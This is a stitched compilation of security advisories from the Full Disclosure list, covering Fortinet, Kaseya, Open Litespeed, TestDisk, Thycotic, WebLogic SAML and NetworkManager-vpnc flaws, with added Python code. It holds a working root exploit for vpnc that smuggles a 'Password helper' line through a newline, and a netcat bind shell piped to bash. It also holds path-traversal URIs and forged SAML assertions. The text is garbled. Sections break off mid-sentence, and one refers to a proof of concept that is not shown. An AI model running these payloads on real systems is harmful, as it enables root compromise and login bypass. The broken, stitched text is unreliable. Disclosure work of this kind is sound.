--[ DTLS Man-In-The-Middle Vulnerability

Fortinet devices were found to use DTLS for the CAPWAP control protocol, with the CAPWAP data protocol being cleartext by default. The CAPWAP DTLS protocol was found to use a universal 'Fortinet_Factory' certificate and private key, the certificate authority for which is static across all Fortinet devices. A method for replacing this certificate was not found.

By harvesting this certificate and key, an attacker may stage Man-In-The-Middle attacks against any Fortinet device using the CAPWAP DTLS protocol. This allows for the retrieval of sensitive information such as wireless SSIDs and WPA passphrases. The two files, 'Fortinet_Factory.cer' and 'Fortinet_Factory.key', can be found in the /etc/cert/local directory on Fortinet devices. The following details the 'Fortinet_Factory' certificate and private key. By using the following certificate an attacker may stage Man in the M
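For comparison with the CAPWAP DoS POC above, which only ever sends the first ClientHello, the following Python 3 code is an added example (not the advisory's POC and not Fortinet code) that builds both sides of the DTLS 1.0 cookie exchange the DoS section describes: the first ClientHello, the HelloVerifyRequest a stateless server answers with, and the second ClientHello echoing the cookie, all wrapped in the same CAPWAP preamble and cipher suite list as the POC. The server cookie is a constructed value; a real server derives it from the client's address with a keyed hash so that it keeps no per-client state until the cookie comes back.

```python
import os
import struct
import time

# Constants matching the advisory's POC: CAPWAP preamble for a DTLS payload, DTLS 1.0,
# and the two cipher suites it offers (TLS_RSA_WITH_AES_128_CBC_SHA, TLS_RSA_WITH_3DES_EDE_CBC_SHA)
CAPWAP_DTLS_PREAMBLE = b"\x01\x00\x00\x00"
DTLS_1_0 = b"\xfe\xff"
HANDSHAKE = 0x16
CLIENT_HELLO, HELLO_VERIFY_REQUEST = 1, 3
CIPHER_SUITES = b"\x00\x2f\x00\x0a"


def u24(n):
    return n.to_bytes(3, "big")


def handshake_msg(msg_type, body, message_seq):
    # DTLS handshake header: type, length, message_seq, fragment_offset, fragment_length
    return (bytes([msg_type]) + u24(len(body)) + struct.pack(">H", message_seq)
            + u24(0) + u24(len(body)) + body)


def record(payload, epoch=0, seq=0):
    # DTLS record header: content type, version, epoch, 48-bit sequence number, length
    return (bytes([HANDSHAKE]) + DTLS_1_0 + struct.pack(">H", epoch)
            + seq.to_bytes(6, "big") + struct.pack(">H", len(payload)) + payload)


def client_hello_body(cookie=b"", random32=None):
    if random32 is None:
        random32 = struct.pack(">I", int(time.time())) + os.urandom(28)
    return (DTLS_1_0 + random32 + b"\x00"                       # empty session id
            + bytes([len(cookie)]) + cookie                     # cookie: empty on the first hello
            + struct.pack(">H", len(CIPHER_SUITES)) + CIPHER_SUITES
            + b"\x01\x00")                                      # one compression method: null


def client_hello(cookie=b"", message_seq=0, record_seq=0, random32=None):
    body = client_hello_body(cookie, random32)
    return CAPWAP_DTLS_PREAMBLE + record(handshake_msg(CLIENT_HELLO, body, message_seq), seq=record_seq)


def hello_verify_request(cookie):
    # What a stateless server answers: its version, then the cookie it wants echoed back
    body = DTLS_1_0 + bytes([len(cookie)]) + cookie
    return CAPWAP_DTLS_PREAMBLE + record(handshake_msg(HELLO_VERIFY_REQUEST, body, 0))


def parse_hello_verify_request(datagram):
    """Return the cookie carried by a CAPWAP-encapsulated HelloVerifyRequest, or raise ValueError."""
    if datagram[:4] != CAPWAP_DTLS_PREAMBLE:
        raise ValueError("not a CAPWAP DTLS datagram")
    rec = datagram[4:]
    if len(rec) < 13 or rec[0] != HANDSHAKE or rec[1:3] != DTLS_1_0:
        raise ValueError("not a DTLS 1.0 handshake record")
    (rec_len,) = struct.unpack(">H", rec[11:13])
    hs = rec[13:13 + rec_len]
    if len(hs) != rec_len or len(hs) < 12 or hs[0] != HELLO_VERIFY_REQUEST:
        raise ValueError("not a HelloVerifyRequest")
    body = hs[12:12 + int.from_bytes(hs[1:4], "big")]
    if len(body) < 3 or len(body) != 3 + body[2]:
        raise ValueError("truncated HelloVerifyRequest body")
    return body[3:]


def cookie_exchange(server_cookie):
    """Both sides of the exchange, offline: first hello, verify request, second hello."""
    first = client_hello()
    hvr = hello_verify_request(server_cookie)             # constructed server reply
    second = client_hello(cookie=parse_hello_verify_request(hvr), message_seq=1, record_seq=1)
    return first, hvr, second


if __name__ == "__main__":
    first, hvr, second = cookie_exchange(os.urandom(20))
    for name, msg in (("ClientHello #1", first), ("HelloVerifyRequest", hvr), ("ClientHello #2", second)):
        print("%-19s %3d bytes  %s" % (name, len(msg), msg[:24].hex()))
```

The first ClientHello is 73 bytes on the wire and carries the same 0x2c handshake length as the POC; the second differs only by the cookie. Answering the first message is meant to cost the server nothing beyond computing the cookie, so a server that does real work before the cookie comes back, as the FortiOS daemon evidently does, has lost the protection the exchange was added for.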
[FD] Kaseya BYOD Gateway Multiple Vulnerabilities
Kaseya BYOD Gateway Multiple Vulnerabilities
Affected Versions: Kaseya BYOD Gateway 7.0.2
PDF: http://www.security-assessment.com/files/documents/advisory/Kaseya_BYOD_Gateway_Multiple_Vulnerabilities.pdf

+-------------+
| Description |
+-------------+

This advisory details multiple vulnerabilities found within the Kaseya BYOD Gateway software. By chaining a combination of missing SSL verification, poor authentication mechanisms and arbitrary redirection vulnerabilities, a malicious entity may potentially compromise any Kaseya BYOD installation.

The Kaseya BYOD Gateway software uses a redirection feature, wherein users are redirected to their local Kaseya installation via Kaseya's hosted servers. The update request from the BYOD Gateway software to the Kaseya hosted servers was not found to verify SSL certificates and fails to implement any form of authentication, instead relying on the length of the gateway identifier to provide security. Thus, the security of the solution depends on an attacker's ability to enumerate the gateway identifier. Once a malicious user enumerates the gateway identifier, they may update the redirect rule for that customer in Kaseya's hosted servers, redirecting customers to a malicious Kaseya BYOD Gateway.

+--------------+
| Exploitation |
+--------------+

--[ Lack of SSL Certificate Validation

The Kaseya BYOD Gateway was not found to validate SSL certificates when contacting the Kaseya hosted servers. Requests were found to be made to the Kaseya hosted servers when updating redirection information (for local-network-only instances of Kaseya) and when submitting licensing information. This allows a malicious entity with network access somewhere between the BYOD Gateway and Kaseya's servers to perform a Man-In-The-Middle attack.
--[ Arbitrary Redirection

By intercepting and replaying the request below, a malicious entity may specify an arbitrary 'url' parameter within the 'siteinfo' XML tag. The Kaseya provisioning relay server then updates the BYOD Gateway redirect with the URL specified. The redirection takes place when a user queries https://provision.relay.kaseya.net/siteinfo/<code> (where <code> is the installation's 6 digit access code). This page is queried during the Kaseya BYOD mobile applications' start-up process in order to determine the location of the BYOD Gateway.

POST /checkin/gateway/rq-be9781109e7111e3afa822000ab9104f HTTP/1.1
Accept-Encoding: identity
Content-Length: {content length}
Host: provision.relay.kaseya.net
Content-Type: text/xml
Connection: close
User-Agent: Kaseya-Tetra/7.0.2 (CL 7)

Once an installation's gateway identifier is known (rq-be9781109e7111e3afa822000ab9104f in the example above), a malicious entity may control the redirection and send users to their own malicious Kaseya BYOD Gateway. The gateway identifier was found to be disclosed in a number of locations, including device logs, the Kaseya BYOD Gateway's pages and Kaseya's hosted relay servers. In particular, the installation gateway identifier is disclosed during the sign-up process. Thus, an attacker that can enumerate the customer's six digit numeric registration code can step through the registration process, retrieve the gateway identifier and hijack the installation.

+----------+
| Solution |
+----------+

No official solution is currently available for this issue.
+---------------------+
| Disclosure Timeline |
+---------------------+

03/10/2014 - Initial contact with Kaseya Support
09/10/2014 - Established Kaseya security contact
13/10/2014 - Advisories sent to Kaseya
21/10/2014 - Additional information sent to Kaseya
22/11/2014 - Update from Kaseya
29/01/2015 - Advisory Release

+-------------------------------+
| About Security-Assessment.com |
+-------------------------------+

Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Ass
[FD] Kaseya Browser Android Path Traversal
Kaseya Browser Android Path Traversal
Affected Versions: Kaseya Browser 7.0 Android
PDF: http://www.security-assessment.com/files/documents/advisory/Kaseya_Browser_Android_Path_Traversal.pdf

+-------------+
| Description |
+-------------+

This advisory details a vulnerability found within the Kaseya Browser Android application. A path traversal vulnerability was discovered within an exported content provider, resulting in the disclosure of arbitrary files, including internal application files.

+--------------+
| Exploitation |
+--------------+

The Kaseya Browser Android application exposes a content provider that is vulnerable to path traversal. This allows any other application installed on the device to read arbitrary files using the Kaseya Browser application's permissions. This can be done by reading from the com.roverapps.retriever content provider as follows:

content://com.roverapps.retriever/../../../../../sdcard/
content://com.roverapps.retriever/../databases/suitestorage.db

+----------+
| Solution |
+----------+

No official solution is currently available for this issue.

+---------------------+
| Disclosure Timeline |
+---------------------+

03/10/2014 - Initial contact with Kaseya Support
09/10/2014 - Established Kaseya security contact
13/10/2014 - Advisories sent to Kaseya
21/10/2014 - Additional information sent to Kaseya
22/11/2014 - Update from Kaseya
29/01/2015 - Advisory Release
For further information on this issue or any of our service offerings, contact us:

Web   www.security-assessment.com
Email info () security-assessment com
Phone +64 4 470 1650

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Open Litespeed Use After Free Vulnerability
Open Litespeed Use After Free Vulnerability
Affected versions: Open Litespeed <= 1.3.9
PDF: http://www.security-assessment.com/files/documents/advisory/Open%20Litespeed%20Use%20After%20Free%20Vulnerability.pdf

+-----------+
|Description|
+-----------+

A use after free vulnerability was discovered within the header parser of the Open Litespeed web server. This vulnerability can be exploited to trigger an out of bounds memory read, resulting in a segmentation fault that crashes the web server.

+------------+
|Exploitation|
+------------+

By sending a crafted request, an attacker may trigger an out-of-bounds memory read, crashing the web server. This is due to a portion of memory being referenced by the application after being freed by a realloc() call. The second parameter (p) to the memmove() call (line 741, httpreq.cpp) within the HttpReq::newKeyValueBuf method results in an out of bounds memory read when the attacker submits a crafted request containing a large number of header rows. This is due to the portion of memory the 'p' parameter resides in being freed by a realloc() call. The reallocation is performed by the allocate() method of the AutoBuf class, which is triggered by the call to AutoBuf's grow() method within the newKeyValueBuf method (line 736, httpreq.cpp). The newKeyValueBuf method snippet is detailed below, showing the call to AutoBuf::grow() and the subsequent memmove() call:

735     if ( m_reqBuf.available() < total )
736         if ( m_reqBuf.grow( total ) )      // may realloc() the buffer that 'p' points into
737             return NULL;
738     char * pNewBuf = m_reqBuf.end();
739     m_reqBuf.used( total );
740     if ( orgSize > 0 )
741         memmove( pNewBuf, p, sizeof( int ) * 2 + sizeof( key_value_pair ) * orgSize );  // 'p' is stale after grow()
742     else
743         *( ((int *)pNewBuf) + 1 ) = 0;

Further information is available in the advisory PDF.
POC exploit code can be found at http://www.security-assessment.com/files/documents/advisory/openlitespeed-1.3.9-UAF-DOS.c

+----------+
| Solution |
+----------+

Update to the latest version of the Open Litespeed web server.

+-------------------+
|Disclosure Timeline|
+-------------------+

26/03/2015 - Advisory sent to Litespeed
27/03/2015 - Response from Litespeed stating the vulnerability will be fixed in the next release of Open Litespeed
10/04/2015 - Open Litespeed 1.3.10 released
14/04/2015 - Advisory PDF released
[FD] TestDisk 6.14 Check_OS2MB Stack Buffer Overflow
TestDisk 6.14 Check_OS2MB Stack Buffer Overflow
Affected versions: TestDisk 6.14 - Linux, Windows and Mac OSX
PDF: http://www.security-assessment.com/files/documents/advisory/Testdisk%20Check_OS2MB%20Stack%20Buffer%20Overflow%20-%20Release.pdf

+-----------+
|Description|
+-----------+

This document details a stack based buffer overflow vulnerability within TestDisk 6.14. A buffer overflow is triggered within the software when recovery is attempted on a malicious disk image. This may be leveraged by an attacker to crash TestDisk and gain control of program execution. An attacker would have to coerce the victim into running TestDisk against their malicious image.

+------------+
|Exploitation|
+------------+

The check_OS2MB method (fat.c, line 862) is vulnerable to a stack based buffer overflow. This is due to the 512 byte buffer 'buffer' (defined in fat.c, check_OS2MB method, line 864) being overflowed by a subsequent memcpy call in the cache_pread_aux method (hdcache.c, line 109). The third argument to the memcpy call (defining the amount of data to be copied) is controlled by the attacker; it is set in a header in the test case (offset 0xC in the test case below, set to 2048, or 0x0800). The following GDB output shows the vulnerable memcpy call and the attacker controlled size argument (0x0800):

Breakpoint 1, 0x0804e5c2 in cache_pread_aux (disk_car=0x80c13b0, buffer=0xb0f0, count=2048, offset=0, read_ahead=0) at hdcache.c:109
109       memcpy(buffer, cache->buffer + offset - cache->cache_offset, count);
(gdb) x/i $eip
=> 0x804e5c2 : call 0x80499f0
(gdb) x/3x $esp
0xb010: 0xb0f0 0x080c3000 0x0800

The following base64 data contains the test case which results in EIP control, in this case EIP being set to BEE5BEE5.
The value EIP is overwritten with is at offset 0x20c in the test case.

--[ Linux

Note that in the provided test case, 4 bytes at 0x210 have been set to a valid address within the TEXT segment of the TestDisk ELF file. This is due to GCC 4.7.2 compiling the check_OS2MB method with the following assembly code:

0x08060a8d <+71>:   call   *%ecx
0x08060a8f <+73>:   mov    %eax,%edx
0x08060a91 <+75>:   mov    0x8(%ebp),%eax
0x08060a94 <+78>:   mov    0x194(%eax),%eax
0x08060a9a <+84>:   cmp    %eax,%edx
0x08060a9c <+86>:   je     0x8060ac5

The instruction 'mov 0x8(%ebp), %eax' (0x08060a91) moves an attacker controlled portion of memory into the EAX register, and the next instruction reads from that address ('mov 0x194(%eax), %eax'). Thus, this value has to be set to a legitimate address, otherwise TestDisk performs an out-of-bounds memory read before returning from the check_OS2MB method. As long as EDX and EAX do not match, the check_OS2MB method calls screen_buffer_add and log_redirect, then jumps to the end of the check_OS2MB method, successfully exploiting the stack overflow and gaining EIP control.

The precompiled version of TestDisk has been compiled with a stack protector. In order to exploit the precompiled version, an attacker would have to find a way to bypass GCC's '-fstack-protector' functionality.

--[ Windows

The provided test case results in EIP being overwritten with 0xBEE5BEE5 in the precompiled version of TestDisk. This was tested on Windows 7 and 8.1.

--[ Mac OSX

An attacker can also gain EIP control on the Mac OSX version of TestDisk 6.14, however the original test case needs to be padded.
The value EIP is overwritten with is at 0x21C in the OSX test case. The base64 of the OSX crash test case is below. As in the above examples, EIP is overwritten with 0xBEE5BEE5.
[FD] SecretServerSecretStealer - An extraction utility for Thycotic Secret Server
SecretServerSecretStealer - A PowerShell script that decrypts the data stored within a Thycotic Secret Server
URL: https://github.com/denandz/SecretServerSecretStealer

+-------------+
| Description |
+-------------+

SecretServerSecretStealer is a PowerShell script that allows for the decryption of passwords (and other items) stored within a Thycotic Secret Server installation. Two methods are exposed, Invoke-SecretDecrypt and Invoke-SecretStealer. Invoke-SecretDecrypt requires you to manually pass the various data needed to decrypt a single secret (see Decryption in README.md). Invoke-SecretStealer is designed to be run on a Thycotic Secret Server machine itself, and takes only the web root as a parameter. The SecretStealer will decrypt the database configuration and connect to the application's database. All relevant information is extracted, and all secrets decrypted.

The script is available at: https://github.com/denandz/SecretServerSecretStealer
[FD] Oracle WebLogic - Multiple SAML Vulnerabilities (CVE-2018-2998/CVE-2018-2933)
Oracle WebLogic - Multiple SAML Vulnerabilities (CVE-2018-2998/CVE-2018-2933)

Release URL: https://pulsesecurity.co.nz/advisories/WebLogic-SAML-Vulnerabilities
Date Released: 18/07/2018
CVE: CVE-2018-2998, CVE-2018-2933
Author: Denis Andzakovic
Vendor Website: http://www.oracle.com
Affected Software: Oracle Fusion Middleware 12c (12.2.1.3.0) WebLogic Server

--[ Description

Two vulnerabilities were discovered within the Oracle WebLogic SAML service provider authentication mechanism. By inserting an XML comment into the SAML NameID tag, an attacker can coerce the SAML service provider to log in as another user. Additionally, WebLogic does not require signed SAML assertions in the default configuration. By omitting the signature portions from a SAML assertion, an attacker can craft an arbitrary SAML assertion and bypass the authentication mechanism.

--[ SAML Authentication Bypass

By inserting an XML comment, an attacker can coerce the WebLogic SAML Service Provider to log in as another user. When an XML comment is added inside a NameID tag, the WebLogic server only processes the string after the comment. Adding the XML comment does not invalidate the SAML assertion's signature. For example, an attacker who can register the user attackeradmin with the identity provider may log in, tamper with the resulting valid SAML assertion without invalidating the signature, and gain access as the admin user. The following figure details the tampered assertion (the full assertion has been omitted for brevity):

attackeradmin

The following figure shows the relevant debug log lines.
Complete log lines have been omitted for brevity:

<[ACTIVE] ExecuteThread: '2' for queue: 'weblogic.kernel.Default (self-tuning)'> <> <> <94584814-7693-4517-b1ce-d6cf53870dcb-0043> <1524397013394> <[severity-value: 128] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > attackeradmin_ommited_
<[ACTIVE] ExecuteThread: '2' for queue: 'weblogic.kernel.Default (self-tuning)'> <> <> <94584814-76934517-b1ce-d6cf53870dcb-0043> <1524397013408> <[severity-value: 128] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] >
<[ACTIVE] ExecuteThread: '2' for queue: 'weblogic.kernel.Default (self-tuning)'> <> <> <94584814-76934517-b1ce-d6cf53870dcb-0043> <1524397013408> <[severity-value: 128] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] >

--[ SAML Insecure Defaults - Missing Signature Verification

In the default configuration, WebLogic does not require SAML assertions to be signed. If the signature section is omitted from a SAML response, then no signature verification is performed. This behavior can be used to bypass authentication and gain access as an arbitrary user. The SingleSignOnServicesMBean.WantAssertionsSigned MBean attribute is not present by default. In this default configuration, an attacker may remove the Signature tags from the SAML assertion, tamper with the assertion (usually setting the ds:NameID to a target user) and log in as any user. The following XML shows an example SAML assertion for a user called 'admin' with the Signature tags removed.
http://localhost:7001/saml2/sp/acs/post"; ID="id39453084082248801717742013" IssueInstant="2018-04-22T10:28:53.593Z" Version="2.0">
REDACTED
REDACTED
admin
http://localhost:7001/saml2/sp/acs/post"; />
WLS_SP
urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport

--[ Timeline

26/04/2018 - Advisory sent to Oracle
26/04/2018 - Advisory acknowledged
27/04/2018 - Case numbers S1003812 and S1003820 assigned to track the SAML authentication bypass and insecure defaults, respectively
25/05/2018 - Automated email update received from Oracle
23/06/2018 - Email from Oracle requesting that the disclosure for the insecure defaults be delayed until at least October
26/06/2018 - Automated email update received from Oracle
05/07/2018 - Response sent to Oracle, advised the original disclosure date will remain
14/07/2018 - Oracle advised both issues are fixed in the upcoming July 17th critical patch update
18/07/2018 - Advisory released

--[ About Pulse Security

Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and review services.

W: https://pulsesecurity.co.nz
E: info at pulsesecurity.co.nz
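To show both WebLogic SAML issues above in code, an added example that is not taken from the advisory or from WebLogic: a DOM-style parse of a NameID containing a comment splits the subject into two text nodes, so a reader that takes only the last node sees 'admin', while a strict reader rejects any NameID with child nodes; and a check mirroring WantAssertionsSigned refuses assertions that carry no ds:Signature at all. The assertions are constructed here, and the signature is only checked for presence, not cryptographically verified.

```python
import xml.etree.ElementTree as ET

NS = {
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}


def _parse(xml_text):
    # insert_comments=True keeps <!-- --> as child nodes, which is how a DOM-style parser
    # presents them and why the text of NameID ends up split in two.
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    return ET.fromstring(xml_text, parser=parser)


def _name_id(root):
    nid = root.find(".//saml:Subject/saml:NameID", NS)
    if nid is None:
        raise ValueError("assertion has no NameID")
    return nid


def _single_text_node(nid):
    """Hardened reading: NameID must be exactly one text node, nothing nested."""
    if len(nid):
        raise ValueError("NameID contains child nodes (comment or element)")
    return (nid.text or "").strip()


def name_id_last_text_node(xml_text):
    """Mimics the flawed behaviour described above: only the text that follows the last
    child node (here, the comment) is taken as the subject. Not WebLogic's code."""
    nid = _name_id(_parse(xml_text))
    return (nid[-1].tail if len(nid) else nid.text) or ""


def name_id_strict(xml_text):
    return _single_text_node(_name_id(_parse(xml_text)))


def validate_assertion(xml_text, want_assertions_signed=True):
    """Structural checks a service provider applies before trusting the subject.
    want_assertions_signed=False reproduces the insecure default described above.
    Cryptographic verification of ds:Signature must still follow (out of scope here)."""
    root = _parse(xml_text)
    if want_assertions_signed and root.find(".//ds:Signature", NS) is None:
        raise ValueError("unsigned assertion rejected")
    return _single_text_node(_name_id(root))


def is_rejected(check, xml_text, **kwargs):
    """True when `check` refuses the assertion with ValueError."""
    try:
        check(xml_text, **kwargs)
    except ValueError:
        return True
    return False


def _assertion(name_id_xml, signed):
    """Constructed minimal assertion, not a real identity provider's output."""
    sig = ('<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">'
           '<ds:SignatureValue>CONSTRUCTED</ds:SignatureValue></ds:Signature>') if signed else ""
    return ('<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"'
            ' ID="_c1" Version="2.0">'
            '<saml:Issuer>https://idp.example.invalid</saml:Issuer>'
            + sig +
            '<saml:Subject><saml:NameID>' + name_id_xml + '</saml:NameID></saml:Subject>'
            '</saml:Assertion>')


TAMPERED_SIGNED = _assertion("attacker<!---->admin", signed=True)   # comment inside NameID
UNSIGNED_ADMIN = _assertion("admin", signed=False)                  # Signature tags removed
CLEAN_SIGNED = _assertion("alice", signed=True)
```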
[FD] Network Manager VPNC - Privilege Escalation (CVE-2018-10900)
Network Manager VPNC - Privilege Escalation (CVE-2018-10900)

Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
Date Released: 21/07/2018
CVE: CVE-2018-10900
Author: Denis Andzakovic
Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc
Affected Software: Network Manager VPNC 1.2.4

--[ Description

The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A new line character can be used to inject a "Password helper" parameter into the configuration data passed to VPNC, allowing an attacker to execute arbitrary commands as root.

--[ Privilege Escalation

When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN. By injecting a \n character into a configuration parameter, an attacker can coerce Network Manager to set the "Password helper" option to an attacker controlled executable file. The following python script generates a VPNC connection which will execute the /tmp/test file when connected. The new line character is injected into the "Xauth username" parameter.
import dbus

con = {
    'vpn': {
        'service-type': 'org.freedesktop.NetworkManager.vpnc',
        'data': {
            'IKE DH Group': 'dh2',
            'IPSec ID': 'testgroup',
            'IPSec gateway': 'gateway',
            'IPSec secret-flags': '4',
            'Local Port': '0',
            'NAT Traversal Mode': 'natt',
            'Perfect Forward Secrecy': 'server',
            'Vendor': 'cisco',
            'Xauth password-flags': '4',
            # the embedded newline turns the remainder into a second directive
            'Xauth username': "username\nPassword helper /tmp/test",
            'ipsec-secret-type': 'unused',
            'xauth-password-type': 'unused'
        }
    },
    'connection': {
        'type': 'vpn',
        'id': 'vpnc_test',
    },
    'ipv4': {'method': 'auto'},
    'ipv6': {'method': 'auto'}
}

bus = dbus.SystemBus()
proxy = bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager/Settings")
settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
settings.AddConnection(con)

The above results in the following configuration being passed to the vpnc process when the connection is initialized:

Debug 0
Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950 --bus-name org.freedesktop.NetworkManager.vpnc.Connection_4
Cisco UDP Encapsulation Port 0
Local Port 0
IKE DH Group dh2
Perfect Forward Secrecy server
Xauth username username
Password helper /tmp/test
IPSec gateway gateway
IPSec ID testgroup
Vendor cisco
NAT Traversal Mode natt

The following figure details the complete privilege escalation attack.

doi@ubuntu:~$ cat << EOF > /tmp/test
> #!/bin/bash
> mkfifo pipe
> nc -k -l -p 8080 < pipe | /bin/bash > pipe
> EOF
doi@ubuntu:~$ python vpnc_privesc.py
doi@ubuntu:~$ nmcli connection
NAME                UUID                                  TYPE      DEVICE
Wired connection 1  a8b178fd-8cbc-3e15-aa9e-d52982215d98  ethernet  ens3
vpnc_test           233101cb-f786-44ed-9e4f-662f1a519429  vpn       ens3
doi@ubuntu:~$ nmcli connection up vpnc_test
^Z
[1]+  Stopped                 nmcli connection up vpnc_test
doi@ubuntu:~$ nc -vv 127.0.0.1 8080
Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)

--[ Timeline

11/07/2018 - Advisory sent to secur...@gnome.org
13/07/2018 - Acknowledgement from Gnome security
20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day
21/07/2018 - Network Manager VPNC 1.2.6 released
21/07/2018 - Advisory released
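An added example, not code from NetworkManager-vpnc, of the property the configuration hand-off above needs: keyword/value pairs destined for vpnc's STDIN must not contain line breaks, because the format is line-oriented and an embedded "\n" becomes a second directive. The keyword list is taken from the configuration dump above; the connection data is constructed here to mirror the script's values.

```python
# Keywords vpnc reads from its STDIN configuration, taken from the dump above; sorted
# longest first because keywords themselves contain spaces ("IPSec ID" vs "IPSec gateway").
VPNC_KEYWORDS = sorted([
    "Debug", "Script", "Cisco UDP Encapsulation Port", "Local Port", "IKE DH Group",
    "Perfect Forward Secrecy", "Xauth username", "Password helper", "IPSec gateway",
    "IPSec ID", "Vendor", "NAT Traversal Mode",
], key=len, reverse=True)


def contains_line_break(items):
    """True if any keyword or value carries CR/LF, i.e. could smuggle an extra directive."""
    return any("\n" in s or "\r" in s for key, value in items for s in (key, value))


def render_vpnc_config(items, strict=True):
    """Serialise (keyword, value) pairs into the line-oriented text vpnc reads on STDIN.
    strict=True refuses embedded line breaks; strict=False reproduces the unchecked
    concatenation that lets a value turn into a standalone directive."""
    if strict and contains_line_break(items):
        raise ValueError("configuration keyword or value contains a line break")
    return "".join(f"{key} {value}\n" for key, value in items)


def parse_vpnc_config(text):
    """Split configuration text back into (keyword, value) directives, one per line,
    the way a line-oriented reader sees it."""
    directives = []
    for line in text.splitlines():
        if not line.strip():
            continue
        for kw in VPNC_KEYWORDS:
            if line == kw or line.startswith(kw + " "):
                directives.append((kw, line[len(kw):].strip()))
                break
        else:
            directives.append(("<unknown>", line))
    return directives


# Constructed connection data mirroring the advisory's script: the third value of
# INJECTED_ITEMS carries the "\n" that, rendered unchecked, becomes a "Password helper" line.
CLEAN_ITEMS = [("IPSec gateway", "gateway"), ("IPSec ID", "testgroup"),
               ("Xauth username", "username")]
INJECTED_ITEMS = [("IPSec gateway", "gateway"), ("IPSec ID", "testgroup"),
                  ("Xauth username", "username\nPassword helper /tmp/test")]
```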